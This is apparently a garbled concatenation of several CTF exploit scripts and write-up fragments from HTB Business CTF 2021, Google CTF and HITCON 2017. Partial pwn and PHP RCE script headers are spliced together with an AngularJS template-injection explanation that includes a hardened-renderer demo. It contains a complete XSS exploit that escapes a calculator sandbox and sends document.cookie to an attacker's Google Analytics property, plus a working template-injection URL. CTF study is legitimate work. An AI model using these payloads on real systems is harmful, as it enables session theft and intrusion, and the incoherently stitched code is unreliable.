This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
'''
Exploit for the "Employee Manager" pwning challenge
HTB Business CTF 2021
DeteAct (https://pentest.global/)
'''
import re
from pwn import *
'''
Exploit for the "Spim Panel" pwning challenge
HTB Business CTF 2021
DeteAct (https://pentest.global/)
'''
from pwn import *

def pack(x):
    # 32-bit word packed big-endian for the target
    return p32(x, endian='big')
from math import pi
from socket import socket

s = socket()
s.connect(('quantum.kelte.cc', 17171))

# Build the gate program sent to the service one line at a time
prog = ''
# Hadamard for the 0th qubit
prog += 'H\n'
from urllib.parse import quote_plus

ga_tid = 'UA-***-1'  # put your GA id here

# Escape from the calculator's expression evaluator: reach Function through
# vars.pi.constructor.name.constructor.constructor (Number -> "Number" -> String
# -> Function) and call it with the last key of the `vars` JSON object as the
# function body. That key is the script text appended below.
url = 'https://gcalc2.web.ctfcompetition.com/'
url += r'?expr=vars.pi.constructor.name.constructor.constructor(vars.pi.constructor.name.match().constructor(vars).keys().constructor.keys(vars).pop())()&vars=%7B%22pi%22:1.0,%22'
# The injected body adds a <script> whose src is the Google Analytics collect
# endpoint, with document.cookie carried in the `cn` parameter, so the cookie
# arrives as an event in the GA property identified by ga_tid.
url += quote_plus('''
script = document.createElement('script');script.src='https://www.google-analytics.com/collect?v=1&tid=%s&cid='+Math.random()+'&t=event&ec=email&el='+Math.random()+'&cs=newsletter&cm=email&cn='+document.cookie+'&cm1=1&ea=test';document.head.appendChild(script);
'''.replace('"', '\\"').replace('\n', '') % ga_tid)
This web application implements a translation service whose dictionary is stored in memory.
One can dump the dictionary as JSON and add values to it.
Looking at the dumped dictionary, it becomes obvious that the application renders some of the dictionary values server-side as AngularJS templates (the keys involved are the site's UI messages rather than translated words).
The solution is to overwrite one of those rendered values and enumerate the methods reachable from inside the AngularJS sandbox until one is found that allows local file inclusion.
Executing Object.keys() on the template scope object (i18n) via the constructor chain:
http://translate.ctfcompetition.com:1337/add?lang=fr&word=in_lang_query_is_spelled&translated={{i18n.constructor.prototype.constructor.keys(i18n)}}
Reading the flag:
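The injection above works because a value the attacker stored is later treated as a template rather than as text. The following is an added example, not the challenge's or DeteAct's code: a toy in-memory translation service rendered two ways. `renderUnsafe()` evaluates the body of every `{{ ... }}` in a stored value as an expression with the dictionary (`i18n`) as the only name in scope, which stands in for the server-side AngularJS interpolation of the challenge (assumption: a plain `Function()` is used here instead of AngularJS's own expression sandbox). `renderSafe()` treats the body as nothing more than a key name. The dictionary contents and the `site_title` key are constructed; `in_lang_query_is_spelled` and the payload are the ones from the URL above.

```javascript
// Added example (not from the challenge or the writeup author).
// Constructed sample dictionary; the first key is the one from the challenge URL.
function makeDict() {
  return {
    in_lang_query_is_spelled: 'Language',
    site_title: 'Translator',
  };
}

// Same operation as the /add endpoint: store an attacker-controlled value.
function addWord(dict, word, translated) {
  dict[word] = translated;
}

const INTERPOLATION = /\{\{([^}]*)\}\}/g;

// VULNERABLE: the interpolation body becomes an expression over `i18n`.
// (Assumption: Function() stands in for AngularJS server-side interpolation.)
function renderUnsafe(template, dict) {
  return template.replace(INTERPOLATION, (_match, body) =>
    String(Function('i18n', `"use strict"; return (${body});`)(dict)));
}

// HARDENED: the interpolation body is only ever a dictionary key lookup,
// so a stored translation is data and can never run as code.
function renderSafe(template, dict) {
  return template.replace(INTERPOLATION, (_match, body) => {
    const key = body.trim();
    return Object.prototype.hasOwnProperty.call(dict, key) ? String(dict[key]) : '';
  });
}

// As in the challenge, the stored value for `key` is itself the template.
function renderMessage(render, dict, key) {
  return render(dict[key], dict);
}

// The gadget chain from the writeup: i18n.constructor is Object (a plain
// object), Object.prototype.constructor is Object again, and Object.keys(i18n)
// enumerates the scope without any global name being reachable.
const PAYLOAD = '{{i18n.constructor.prototype.constructor.keys(i18n)}}';

function demo() {
  const dict = makeDict();
  addWord(dict, 'in_lang_query_is_spelled', PAYLOAD);
  return {
    // evaluates the chain and lists every key of the scope object
    unsafe: renderMessage(renderUnsafe, dict, 'in_lang_query_is_spelled'),
    // no key of that name exists, so the injection renders as empty text
    safe: renderMessage(renderSafe, dict, 'in_lang_query_is_spelled'),
    // ordinary interpolation still works in the hardened renderer
    benign: renderSafe('{{site_title}}: {{in_lang_query_is_spelled}}', makeDict()),
  };
}

console.log(demo());
```

The real interpolation runs inside AngularJS's expression sandbox, so the exact set of reachable gadgets differs from plain `Function()`; what the example isolates is the root cause (an attacker-stored value is evaluated at all) and the fix (look keys up, never evaluate), which is the same for either evaluator.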
import time
import sys
from collections import defaultdict
from ctypes import CDLL
from pwn import *
from z3 import *

s = Solver()
'''
HITCON CTF Quals 2017 BabyFirst Revenge v2 exploit
Task was to leverage 4-byte shell command execution in PHP into full RCE
'''
from requests import get, post

URL = 'http://52.197.41.31/?'

print('Reset all')